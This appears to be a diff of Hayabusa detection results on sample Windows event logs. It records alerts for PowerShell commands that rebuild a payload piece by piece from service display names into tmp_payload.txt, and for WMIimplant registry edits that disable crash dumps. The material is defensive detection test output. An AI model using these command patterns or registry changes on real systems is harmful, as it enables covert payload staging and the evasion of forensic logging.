+2021-11-03 17:39:56.213 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg226"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x750 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd48 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:57.679 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg227"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc74 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:39:59.127 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg228"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x490 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xacc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:00.581 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg229"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xff4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:02.034 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc94 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:02.050 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg230"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc10 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:03.487 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc64 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:03.503 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg231"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf78 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd14 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:04.941 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg232"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf3c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:06.381 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg233"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfb0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:07.834 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg234"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x38c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:09.316 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe7c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:09.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg235"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xbac | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:10.768 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg236"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe58 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x888 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:12.215 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg237"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x394 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe24 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:13.660 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg238"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc54 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:15.098 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:15.113 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg239"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xf34 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x68c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:16.552 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg240"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdf8 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:18.002 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg241"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb1c | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:19.468 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x608 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:19.484 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg242"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:20.926 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xab4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:20.942 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg243"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xeb4 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:22.374 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdf0 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:40:22.390 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg244"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x944 | User: FS03$ | LID: 0x3e7",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-03 17:53:41.099 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\LogEvent: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\SendAlert: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\CrashDumpEnabled: DWORD (0x00000007) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\Overwrite: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\KernelDumpOnly: DWORD (0x00000000) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.123 +09:00,fs03vuln.offsec.lan,13,medium,,CrashControl CrashDump Disabled,,../hayabusa-rules/sigma/registry_event/registy_event_crashdump_disabled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
+2021-11-08 19:26:55.139 +09:00,fs03vuln.offsec.lan,13,medium,,Registry Key Value Set_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | SetValue: HKLM\System\CurrentControlSet\Control\CrashControl\AutoReboot: DWORD (0x00000001) | Process: C:\Windows\system32\wbem\wmiprvse.exe | PID: 1508 | PGUID: A57649D1-1303-6179-D9C8-010000000000",../hayabusa-rules/hayabusa/sysmon/alerts/13_RegistryKeyValueSet_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1546-Event Triggered Execution/ID13-WMIimplant registry crash control.evtx
